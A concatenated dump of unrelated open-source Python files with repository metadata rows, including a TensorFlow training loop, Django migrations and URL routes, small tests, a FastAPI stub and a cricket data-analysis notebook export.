# once every 20 iterations evaluate things for the validation set.
print_per = 20
if n%print_per == 1:
gc.collect()
train_cost = sess.run(MeanSquareCost, feed_dict={x:xA, y_: yA})
sum_rms = 0
eval_cost = 0
num_chunks = 20
for it in range(num_chunks):
eval_cost = eval_cost + sess.run(
MeanSquareCost, feed_dict={
x: X_test[ind_t[0+50*it:50+50*it]],
y_: Y_test[ind_t[0+50*it:50+50*it],:]})
A = sess.run(
y_conv, feed_dict={
x: X_test[ind_t[0+50*it:50+50*it]]})
B = sess.run(
y_conv_flipped, feed_dict={
x: X_test[ind_t[0+50*it:50+50*it]]})
ROT_COR_PARS = get_rotation_corrected(
A,B,Y_test[ind_t[0+50*it:50+50*it],:])
sum_rms = sum_rms + np.std(
ROT_COR_PARS-Y_test[ind_t[0+50*it:50+50*it], :], axis=0)
eval_cost = eval_cost / num_chunks
print("mod "+ str(model_num) + ", lr: " + str(learning_rate)
+ ", " + np.array_str(sum_rms/num_chunks, precision=2))
# show the iteration number, training cost, validation cost, and the
# average time per iteration for training
print(" "
+ "%0.4d %0.4d %0.5f %0.5f %0.5f %0.3f"%(
i_sample, i, train_cost, eval_cost, min_eval_cost,
(time.time()-start_time)/print_per))
start_time = time.time()
# save file when validation cost drops
if SAVE & (eval_cost<min_eval_cost) & (n>20):
print "saving weights to the disk (eval) ..."
save_path = saver.save(sess, save_file)
print "done."
min_eval_cost = np.minimum(min_eval_cost,eval_cost)
sess.run(train_step, feed_dict={x: xA, y_: yA})
| 38.849462 | 80 | 0.562137 | 505 | 3,613 | 3.736634 | 0.261386 | 0.055114 | 0.025437 | 0.028617 | 0.293588 | 0.212507 | 0.144144 | 0.077901 | 0.077901 | 0.077901 | 0 | 0.043513 | 0.313036 | 3,613 | 92 | 81 | 39.271739 | 0.716761 | 0.060614 | 0 | 0.054054 | 0 | 0.013514 | 0.058261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.094595 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7aaa78c4723caeac3fb5b1b2b9fe69e555ed2d5d | 654 | py | Python | instructors/course-2015/errors_and_introspection/project/primesieve1.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 46 | 2017-09-27T20:19:36.000Z | 2020-12-08T10:07:19.000Z | instructors/course-2015/errors_and_introspection/project/primesieve1.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 6 | 2018-01-09T08:07:37.000Z | 2020-09-07T12:25:13.000Z | instructors/course-2015/errors_and_introspection/project/primesieve1.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 18 | 2017-10-10T02:06:51.000Z | 2019-12-01T10:18:13.000Z | """
Sieve of Erasmus - Prime Sieve
Goal: Find the first n primes
What we know:
For a given integer, take every integer between 1 and itself.
Test itself modulo that integer. If results is zero, then it is nonprime.
If none of these modulo give zero, then it is prime.
"""
# range will include the first argument and the 2nd argument minus 1.
range_to_test_for_primes = range(1,50)
def is_prime_helper(i):
""" Spitballing prime helpers
"""
if i % (i-1) == 0:
return False
def is_prime(i):
"""
"""
for x in range_to_test_for_primes:
range_to_test = range(2,x)
if x % 2 =! 0:
| 17.210526 | 77 | 0.637615 | 106 | 654 | 3.811321 | 0.518868 | 0.05198 | 0.081683 | 0.059406 | 0.123762 | 0.123762 | 0 | 0 | 0 | 0 | 0 | 0.023256 | 0.276758 | 654 | 37 | 78 | 17.675676 | 0.830867 | 0.102446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7aab6b0db7e62b035b739900d595c37d109328d7 | 824 | py | Python | events/migrations/0003_event_color.py | jjorissen52/golf_site2 | bcadd35f8386a20e532769cadf93eed6cea304fa | [
"MIT"
] | null | null | null | events/migrations/0003_event_color.py | jjorissen52/golf_site2 | bcadd35f8386a20e532769cadf93eed6cea304fa | [
"MIT"
] | 7 | 2019-10-21T21:55:23.000Z | 2021-06-08T19:43:12.000Z | events/migrations/0003_event_color.py | jjorissen52/golf-site | 4050f4518daf4c5b058f7fc38702a153021c2e1b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2017-11-04 03:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('events', '0002_auto_20171103_2212'),
]
operations = [
migrations.AddField(
model_name='event',
name='color',
field=models.CharField(choices=[('#FFFFFF', 'White'), ('#C0C0C0', 'Silver'), ('#808080', 'Gray'), ('#000000', 'Black'), ('#FF0000', 'Red'), ('#800000', 'Maroon'), ('#FFFF00', 'Yellow'), ('#808000', 'Olive'), ('#00FF00', 'Lime'), ('#008000', 'Green'), ('#00FFFF', 'Aqua'), ('#008080', 'Teal'), ('#0000FF', 'Blue'), ('#000080', 'Navy'), ('#FF00FF', 'Fuchsia'), ('#800080', 'Purple')], default='#0000FF', max_length=7),
),
]
| 39.238095 | 428 | 0.565534 | 85 | 824 | 5.364706 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159463 | 0.18568 | 824 | 20 | 429 | 41.2 | 0.520119 | 0.082524 | 0 | 0 | 1 | 0 | 0.313413 | 0.030544 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ab3d8c6fd521a3eb09a2a807ea3c5f59c26bd3d | 692 | py | Python | pavo_cristatus/tests/interactions_tests/test_non_annotated_project_loader_interaction.py | MATTHEWFRAZER/pavo_cristatus | a4b96c0eb6c454fbe38d2092e29f63457a4ee955 | [
"MIT"
] | null | null | null | pavo_cristatus/tests/interactions_tests/test_non_annotated_project_loader_interaction.py | MATTHEWFRAZER/pavo_cristatus | a4b96c0eb6c454fbe38d2092e29f63457a4ee955 | [
"MIT"
] | null | null | null | pavo_cristatus/tests/interactions_tests/test_non_annotated_project_loader_interaction.py | MATTHEWFRAZER/pavo_cristatus | a4b96c0eb6c454fbe38d2092e29f63457a4ee955 | [
"MIT"
] | null | null | null | import os
from pavo_cristatus.interactions.non_annotated_project_loader_interaction.non_annotated_project_loader_interaction import interact
from pavo_cristatus.interactions.pavo_cristatus_status import PavoCristatusStatus
unit_test_path = os.path.split(__file__)[0]
project_root_path = os.path.normpath(os.path.join(unit_test_path, "..", "..", "project_fake")).replace("\\", "\\\\")
expected_files = {"__init__.py", "module_fake.py"}
def test_annotated_project_loader_interaction():
result = interact(project_root_path)
assert result.status == PavoCristatusStatus.SUCCESS
assert all(module_symbols.python_file.file_name in expected_files for module_symbols in result.result)
| 46.133333 | 130 | 0.812139 | 90 | 692 | 5.8 | 0.444444 | 0.074713 | 0.126437 | 0.189655 | 0.137931 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001575 | 0.08237 | 692 | 14 | 131 | 49.428571 | 0.820472 | 0 | 0 | 0 | 0 | 0 | 0.067919 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ab5d3886e481d9fd30cc1cfa29570356f13d910 | 945 | py | Python | book_env/Lib/site-packages/pandas_datareader/tests/test_base.py | als0052/Hands-On-Data-Analysis-with-Pandas | ea4e94f93a1e00cbccb493f22dde5c8007ed5e76 | [
"MIT"
] | 1 | 2018-01-11T14:11:40.000Z | 2018-01-11T14:11:40.000Z | book_env/Lib/site-packages/pandas_datareader/tests/test_base.py | als0052/Hands-On-Data-Analysis-with-Pandas | ea4e94f93a1e00cbccb493f22dde5c8007ed5e76 | [
"MIT"
] | 12 | 2020-06-06T01:22:26.000Z | 2022-03-12T00:13:42.000Z | book_env/Lib/site-packages/pandas_datareader/tests/test_base.py | als0052/Hands-On-Data-Analysis-with-Pandas | ea4e94f93a1e00cbccb493f22dde5c8007ed5e76 | [
"MIT"
] | 5 | 2018-05-19T05:08:51.000Z | 2021-04-29T16:03:45.000Z | import pytest
import requests
import pandas_datareader.base as base
class TestBaseReader(object):
def test_requests_not_monkey_patched(self):
assert not hasattr(requests.Session(), 'stor')
def test_valid_retry_count(self):
with pytest.raises(ValueError):
base._BaseReader([], retry_count='stuff')
with pytest.raises(ValueError):
base._BaseReader([], retry_count=-1)
def test_invalid_url(self):
with pytest.raises(NotImplementedError):
base._BaseReader([]).url
def test_invalid_format(self):
with pytest.raises(NotImplementedError):
b = base._BaseReader([])
b._format = 'IM_NOT_AN_IMPLEMENTED_TYPE'
b._read_one_data('a', None)
class TestDailyBaseReader(object):
def test_get_params(self):
with pytest.raises(NotImplementedError):
b = base._DailyBaseReader()
b._get_params()
| 28.636364 | 54 | 0.660317 | 105 | 945 | 5.647619 | 0.447619 | 0.059022 | 0.134907 | 0.134907 | 0.382799 | 0.317032 | 0.317032 | 0.168634 | 0 | 0 | 0 | 0.001389 | 0.238095 | 945 | 32 | 55 | 29.53125 | 0.822222 | 0 | 0 | 0.208333 | 0 | 0 | 0.038095 | 0.027513 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.208333 | false | 0 | 0.125 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7ab71be8f87ed1d659c3f47a1fed46f77be7dcc7 | 1,387 | py | Python | run.py | ITJoker233/RaspberryPiWebSDK | ae24ec9a84ed34efcccca59055bdf097a42c3409 | [
"MIT"
] | 4 | 2020-11-15T05:38:02.000Z | 2022-03-07T12:19:37.000Z | run.py | ITJoker233/RaspberryPiWebSDK | ae24ec9a84ed34efcccca59055bdf097a42c3409 | [
"MIT"
] | null | null | null | run.py | ITJoker233/RaspberryPiWebSDK | ae24ec9a84ed34efcccca59055bdf097a42c3409 | [
"MIT"
] | null | null | null | import uvicorn
from datetime import datetime
from typing import List, Optional
from fastapi import FastAPI
from fastapi.encoders import jsonable_encoder
from fastapi.responses import JSONResponse
from pydantic import BaseModel, EmailStr
app = FastAPI()
_version_ = '1.0.0'
class baseRequest(BaseModel):
num: Optional[int] = None
ioType:str
key:str
status: bool
class baseResponse(BaseModel):
detail:str
data:str
message:str
status: int
timestamp: datetime
response = {
'root':{'data':f'Raspberry Pi Web SDK {_version_} Look at /docs','detail':'','message':'Success','status':1},
'version':{'data':f'Raspberry Pi Web SDK {_version_}','detail':'','message':'Success','status':1},
'status':{'data':'','detail':'','message':'','status':0},
}
@app.get("/",response_model=baseResponse)
async def root():
return JSONResponse(response['root'])
@app.get("/version",response_model=baseResponse)
async def version():
return JSONResponse(response['version'])
@app.get('/status/{gpio_id}',response_model=baseResponse)
async def read_item(gpio_id: int):
response_ = response['status']
response_['data']
response_['message']
response_['status']
return JSONResponse(response_)
#if __name__ == "__main__":
# uvicorn.run(app, host="0.0.0.0", port=80,debug=True) | 27.196078 | 114 | 0.669791 | 166 | 1,387 | 5.439759 | 0.385542 | 0.008859 | 0.083056 | 0.099668 | 0.233666 | 0.06423 | 0.06423 | 0 | 0 | 0 | 0 | 0.010526 | 0.178082 | 1,387 | 51 | 115 | 27.196078 | 0.781579 | 0.05912 | 0 | 0 | 0 | 0 | 0.19378 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.184211 | 0 | 0.552632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7ab8a9c5276a11c96afe25603d9046739df569e8 | 605 | py | Python | python/show_spec.py | nox-410/MusicAndMathClassProject | 457e800b05dcf1595f97e359f75d14bf1fcc35d4 | [
"Apache-2.0"
] | null | null | null | python/show_spec.py | nox-410/MusicAndMathClassProject | 457e800b05dcf1595f97e359f75d14bf1fcc35d4 | [
"Apache-2.0"
] | null | null | null | python/show_spec.py | nox-410/MusicAndMathClassProject | 457e800b05dcf1595f97e359f75d14bf1fcc35d4 | [
"Apache-2.0"
] | null | null | null | import sys
import numpy as np
from PIL import Image
def spec_to_png(in_path, out_path):
specgram = np.load(in_path) # (channels, bins, frames)
specgram = specgram[0]
specgram = np.log2(specgram)
specgram = specgram.sum(1)[:, np.newaxis]
specgram = np.repeat(specgram, 128, axis=1)
smax, smin = np.max(specgram), np.min(specgram)
specgram = (specgram - smin) / (smax - smin)
specgram = (specgram * 256).astype(np.uint8)
specgram = np.flipud(specgram)
Image.fromarray(specgram).save(out_path)
if __name__ == '__main__':
spec_to_png(sys.argv[1], sys.argv[2])
| 28.809524 | 59 | 0.672727 | 87 | 605 | 4.494253 | 0.494253 | 0.245524 | 0.046036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026423 | 0.186777 | 605 | 20 | 60 | 30.25 | 0.768293 | 0.039669 | 0 | 0 | 0 | 0 | 0.013817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.1875 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7abe28c365aac27b7165b4ab17f3803fad4552ae | 7,075 | py | Python | EDA_T-20WorldCup.py | Saurabh2509/T-20_World_Cup_EDA | 39c236b97f48155a535b0b0c7730eb70d020c261 | [
"MIT"
] | null | null | null | EDA_T-20WorldCup.py | Saurabh2509/T-20_World_Cup_EDA | 39c236b97f48155a535b0b0c7730eb70d020c261 | [
"MIT"
] | null | null | null | EDA_T-20WorldCup.py | Saurabh2509/T-20_World_Cup_EDA | 39c236b97f48155a535b0b0c7730eb70d020c261 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# ## Exploratory_Data_Analysis
# In[4]:
Image("E:\DataScience\Data_Center\T_20_World_cup_data\ICC_Men's_T20_World_Cup_2021.png")
# In[1]:
pwd
# In[2]:
import os
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('darkgrid')
import plotly.express as px
import pandas as pd
import numpy as np
from scipy import signal
#to supress warning
import warnings
warnings.filterwarnings('ignore')
#to make shell more intractive
from IPython.display import display
from IPython.display import Image
# setting up the chart size and background
plt.rcParams['figure.figsize'] = (16, 8)
plt.style.use('fivethirtyeight')
# In[3]:
path ="E:\DataScience\Data_Center\T_20_World_cup_data"
dir_list = os.listdir(path)
print(dir_list)
# In[5]:
df =pd.read_csv("E:\DataScience\Data_Center\T_20_World_cup_data\kaggle_data.csv")
# In[6]:
df.head()
# In[7]:
df.tail()
# In[8]:
df.columns
# In[9]:
df.describe()
# In[10]:
df.info()
# In[11]:
df.isnull().sum()
# In[12]:
df.nunique(axis=0)
# In[13]:
A=df['team_1'].unique()
print(A)
# In[14]:
B =df['stage'].unique()
print(B)
# In[15]:
C=df['Winner_toss'].unique()
print(C)
# In[16]:
D=df['Toss_descision'].unique()
print(D)
# In[17]:
E=df['time'].unique()
print(E)
# In[18]:
F =df['venue'].unique()
print(F)
# In[19]:
G=df['avg_temperature'].unique()
print(G)
# In[20]:
I =df['best_bowler'].unique()
print(I)
# In[21]:
H =df['bowling_arm'].unique()
print(H)
# In[22]:
J =df['bowling_style'].unique()
print(J)
# In[23]:
K =df['most_individual_wickets'].unique()
print(K)
# In[24]:
H =df['best_batter_team'].unique()
print(H)
# In[25]:
I =df['Player_of_the_match'].unique()
print(I)
# In[26]:
#remnaming
df = df.rename(columns = {'Unnamed: 0' : 'Match Number'})
df.head()
# In[27]:
#index match
df = df.set_index('Match Number')
df.head()
# In[28]:
Time =df['time'].value_counts()
# In[29]:
Time
# In[30]:
type(Time)
# In[31]:
toss_list =df['Winner_toss'].tolist()
win_list=df['Winner'].tolist()
winner=0
looser=0
for i in range(len(toss_list)):
if(toss_list[i] == win_list[i]):
winner +=1
else:
looser +=1
print("Won Toss and Won Match:",winner)
print("Won Toss and Loose Match:",looser)
# In[32]:
#match won by each team
plt.figure(figsize = (8,6))
sns.countplot(df['time'], palette = 'Set1')
plt.title("Time Slot :Match")
plt.show()
# In[33]:
# Temprature range:
fig =px.pie(Time ,values =df['avg_temperature'].value_counts(),names=['30-Temp','33-Temp','34-Temp','29-Temp',
'28-Temp','31-Temp','20-Temp','27-temp','26-Temp'],
title=' Temparature Range Records while Match:')
fig.update_traces(textposition='inside', textinfo='percent+label')
fig.show()
#temp in *c
# In[34]:
#match won by each team
sns.countplot(y='Winner',data=df)
# In[35]:
#count of venue
plt.figure(figsize = (8,6))
sns.countplot(df['venue'], palette = 'Set1')
plt.title("Venue for Tournament")
plt.show()
# In[36]:
#Man of MATCH
print("Player : No_of_times_player_of_match")
df['Player_of_the_match'].value_counts().nlargest(5)
# In[37]:
# correlation
plt.figure(figsize = (8,6))
sns.heatmap(df.corr(), annot = True, cmap = 'OrRd')
plt.title("Correlation")
plt.show()
# In[38]:
#colum name-update
df.target_achieved[df['target_achieved'] == 0] = 'Achieved'
df.target_achieved[df['target_achieved'] == 1] = 'Not Achieved'
df.head()
# In[39]:
plt.figure(figsize = (8,6))
sns.countplot(df['stage'], palette = 'Set1')
plt.title("Stage of Tournament")
plt.show()
# In[40]:
plt.figure(figsize = (8,6))
sns.countplot(y=df['best_batter_team'], palette = 'Set1')
plt.title("Best Batting Team")
plt.show()
# In[41]:
plt.figure(figsize = (8,6))
sns.countplot(y=df['best_bowler_country'], palette = 'Set1')
plt.title("Best Bolwing Team")
plt.show()
# In[42]:
print("Top 5 Batsman in T20-World-Cup-2021:")
df['best_batter'].value_counts().nlargest(5)
# In[43]:
print("Top 5 Bolwer in T20-World-Cup-2021:")
df['best_bowler'].value_counts().nlargest(5)
# In[44]:
print("Top 10 highest Score:")
df['target'].sort_values(ascending=False).nlargest(10)
# In[45]:
print("Least 10 Score:")
df['target'].sort_values(ascending=False).nsmallest(10)
# In[46]:
print("Top 10 high_indvidual_scores:")
df['high_indvidual_scores'].sort_values(ascending=False).nlargest(10)
# In[60]:
#by each team
plt.figure(figsize = (8,6))
sns.countplot(df['Toss_descision'], palette = 'Set1')
plt.title("Toss descision")
plt.show()
# In[ ]:
# In[47]:
#team 1 & target achievement
achieved_target_team1 = df.groupby(['team_1', 'target_achieved']).size().reset_index(name = 'Count')
# In[48]:
#visualize team 1
plt.figure(figsize = (10,6))
chart = sns.barplot(data =achieved_target_team1 , x = 'team_1', y ='Count', hue = 'target_achieved', palette = 'Set1')
chart.set_xticklabels(chart.get_xticklabels(), rotation = 35)
plt.title("Team 1 - Achievement")
plt.show()
# In[49]:
#team 2 & target achievement
achieved_target_team2 = df.groupby(['team_2', 'target_achieved']).size().reset_index(name = 'Count')
# In[50]:
#visualize team 2
plt.figure(figsize = (10,6))
chart = sns.barplot(data =achieved_target_team2 , x = 'team_2', y ='Count', hue = 'target_achieved', palette = 'Set1')
chart.set_xticklabels(chart.get_xticklabels(), rotation = 35)
plt.title("Team 2 - Achievement")
plt.show()
# In[51]:
Team =df.groupby(['team_1','team_2','Winner_toss','time','Toss_descision','venue','Player_of_the_match']).size()
# In[52]:
Team=Team.to_frame()
# In[53]:
Team
# In[54]:
type(Team)
# In[55]:
fig = px.sunburst(df, names=None, values=None, parents=None, path=['team_1','team_2','Toss_descision','Winner','venue'],
color='team_2', color_continuous_scale=None, range_color=None, color_continuous_midpoint=None,
color_discrete_sequence=None, color_discrete_map={},
hover_data=['team_1','team_2','Toss_descision','Winner','venue'],
labels={}, title= "Team VS Team - Winner")
fig.show()
# In[56]:
Stage=df.groupby(['stage','team_1','team_2','Winner_toss','time','Toss_descision','venue']).size()
# In[57]:
Stage=Stage.to_frame()
# In[58]:
Stage
# In[59]:
fig = px.sunburst(df, names=None, values=None, parents=None, path=['stage','team_1','team_2','Winner_toss','time','Toss_descision','venue'],
color='team_1', color_continuous_scale=None, range_color=None, color_continuous_midpoint=None,
color_discrete_sequence=None, color_discrete_map={},
hover_data=['stage','team_1','team_2','time','Toss_descision','venue'] ,
labels={'Stage','Team-A','Team-B','Time','Toss_descision','Venue'}, title= "Detailed_Analysis Chart")
fig.show()
# In[62]:
#
sns.pairplot(df,hue='team_1')
# In[ ]:
-----------------XXX-----------------
@copyright : Saurabh 29-nov
| 14.15 | 141 | 0.642686 | 1,065 | 7,075 | 4.124883 | 0.271362 | 0.015934 | 0.032779 | 0.027089 | 0.390394 | 0.338721 | 0.319372 | 0.281129 | 0.233326 | 0.208058 | 0 | 0.041716 | 0.159717 | 7,075 | 499 | 142 | 14.178357 | 0.697225 | 0.125371 | 0 | 0.214286 | 0 | 0 | 0.272951 | 0.045902 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.064935 | null | null | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8f8bac00504c5bb434251bf0a0ab45ac3d403096 | 217 | py | Python | Desafios/AULA/2.1 Boliche com Tio Rubs.py | evertonROY/Python | b64f98e52700a4f1f4212400b69c9d6d080c8f88 | [
"MIT"
] | null | null | null | Desafios/AULA/2.1 Boliche com Tio Rubs.py | evertonROY/Python | b64f98e52700a4f1f4212400b69c9d6d080c8f88 | [
"MIT"
] | null | null | null | Desafios/AULA/2.1 Boliche com Tio Rubs.py | evertonROY/Python | b64f98e52700a4f1f4212400b69c9d6d080c8f88 | [
"MIT"
] | null | null | null | '''
a = qtd pistas 1
b = qtd pessoas por pistas 9
c = qtd alunos 4
'''
A, B, C = [int(x) for x in input().split()]
if (A*B) > C:
print("S")
else:
print("N")
| 16.692308 | 43 | 0.400922 | 33 | 217 | 2.636364 | 0.666667 | 0.045977 | 0.068966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02459 | 0.437788 | 217 | 12 | 44 | 18.083333 | 0.688525 | 0.493088 | 0 | 0 | 0 | 0 | 0.019608 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8f8efc2310eeea2e384d88b51c3b58442b2b2f34 | 809 | py | Python | src/comexio_http/tag.py | sanderd17/comexio-http-api | 08580f118365e50b9473bb3437158baff1e07c8b | [
"MIT"
] | null | null | null | src/comexio_http/tag.py | sanderd17/comexio-http-api | 08580f118365e50b9473bb3437158baff1e07c8b | [
"MIT"
] | null | null | null | src/comexio_http/tag.py | sanderd17/comexio-http-api | 08580f118365e50b9473bb3437158baff1e07c8b | [
"MIT"
] | null | null | null | from .auth import Auth
class Tag:
"""
Abstract Comexio tag,
Address is a dictionary that defines the data point in one of the following formats:
{
ext: "IO-Server",
io: "Q1",
}
{
marker: "M1"
}
{
onewire: "OT1"
}
"""
def __init__(self, address: dict, auth: Auth):
self.auth = auth
self.address = address
@property
def value(self):
return float(self.raw_data.strip("\x00")) # TODO: let user choose between float, int or bool
async def async_set(self, value):
"""Set the IO value"""
await self.auth.request(self.address | {"action": "set", "value": value})
await self.async_get()
async def async_get(self):
"""Refresh the IO data."""
self.raw_data = await self.auth.request(self.address | {"action": "get"})
| 23.794118 | 96 | 0.611867 | 110 | 809 | 4.418182 | 0.5 | 0.090535 | 0.049383 | 0.082305 | 0.152263 | 0.152263 | 0.152263 | 0 | 0 | 0 | 0 | 0.008224 | 0.248455 | 809 | 33 | 97 | 24.515152 | 0.791118 | 0.311496 | 0 | 0 | 0 | 0 | 0.056842 | 0 | 0 | 0 | 0 | 0.030303 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0.076923 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8f9bccca00ad377e38355adc4cdf7e077d4479ca | 1,880 | py | Python | events/urls/my.py | Ben-Peters/lnldb | 4264ce52e85c20fe1e964f9e36aa4289b0e7e3c7 | [
"MIT"
] | null | null | null | events/urls/my.py | Ben-Peters/lnldb | 4264ce52e85c20fe1e964f9e36aa4289b0e7e3c7 | [
"MIT"
] | null | null | null | events/urls/my.py | Ben-Peters/lnldb | 4264ce52e85c20fe1e964f9e36aa4289b0e7e3c7 | [
"MIT"
] | null | null | null | from django.conf.urls import include, url
from django.contrib.auth.decorators import login_required
from .. import views
app_name = 'lnldb'
# prefix: /my/
urlpatterns = [
url(r'^workorders/$', views.my.mywo, name="workorders"),
url(r'^workorders/attach/(?P<id>[0-9]+)/$', views.flow.assignattach_external, name="event-attach"),
url(r'^office-hours/$', views.my.office_hours, name="office-hours"),
url(r'^office-hours/update/$', views.my.hours_update, name="hours-update"),
url(r'^orgs/', include([
url(r'^$', views.my.myorgs, name="orgs"),
url(r'^form/$', views.my.myorgform, name="org-request"),
url(r'^(?P<id>[0-9a-f]+)/$', views.orgs.orgedit, name="org-edit"),
url(r'^transfer/(?P<id>[0-9]+)/$', views.orgs.org_mkxfer, name="org-transfer"),
url(r'^transfer/(?P<idstr>[0-9a-f]+)/accept/$', views.orgs.org_acceptxfer,
name="org-accept"),
])),
url(r'^events/', include([
url(r'^$', views.my.myevents, name="events"),
# TODO: merge these with their events equivalents.
url(r'^(?P<eventid>[0-9]+)/files/$', views.my.eventfiles, name="event-files"),
url(r'^(?P<eventid>[0-9]+)/report/$', views.my.ccreport, name="report"),
url(r'^(?P<eventid>[0-9]+)/hours/$', views.my.hours_list, name="hours-list"),
url(r'^(?P<eventid>[0-9]+)/hours/bulk/$', views.my.hours_bulk,
name="hours-bulk"),
url(r'^(?P<eventid>[0-9]+)/hours/mk/$', views.my.hours_mk,
name="hours-new"),
url(r'^(?P<eventid>[0-9]+)/hours/(?P<userid>[0-9]+)$', views.my.hours_edit,
name="hours-edit"),
url(r'^(?P<eventid>[0-9]+)/survey/$', login_required(views.my.PostEventSurveyCreate.as_view()),
name="post-event-survey"),
url(r'^survey/success/$', views.my.survey_success, name="survey-success"),
])),
]
| 42.727273 | 103 | 0.589362 | 267 | 1,880 | 4.097378 | 0.273408 | 0.073126 | 0.036563 | 0.076782 | 0.159049 | 0.107861 | 0.06947 | 0 | 0 | 0 | 0 | 0.015296 | 0.165426 | 1,880 | 43 | 104 | 43.72093 | 0.681963 | 0.032447 | 0 | 0.060606 | 0 | 0 | 0.344163 | 0.190529 | 0 | 0 | 0 | 0.023256 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8f9d366bd7ef0370059c3ee36ddc5d684a58e7bd | 3,463 | py | Python | python/compute_bayes_factors.py | CardiacModelling/PyHillFit | 91a9b5dd3a9455dbf0f3a2ea4785402925fab26b | [
"BSD-3-Clause"
] | 9 | 2016-11-21T13:38:59.000Z | 2021-11-16T04:03:57.000Z | python/compute_bayes_factors.py | CardiacModelling/PyHillFit | 91a9b5dd3a9455dbf0f3a2ea4785402925fab26b | [
"BSD-3-Clause"
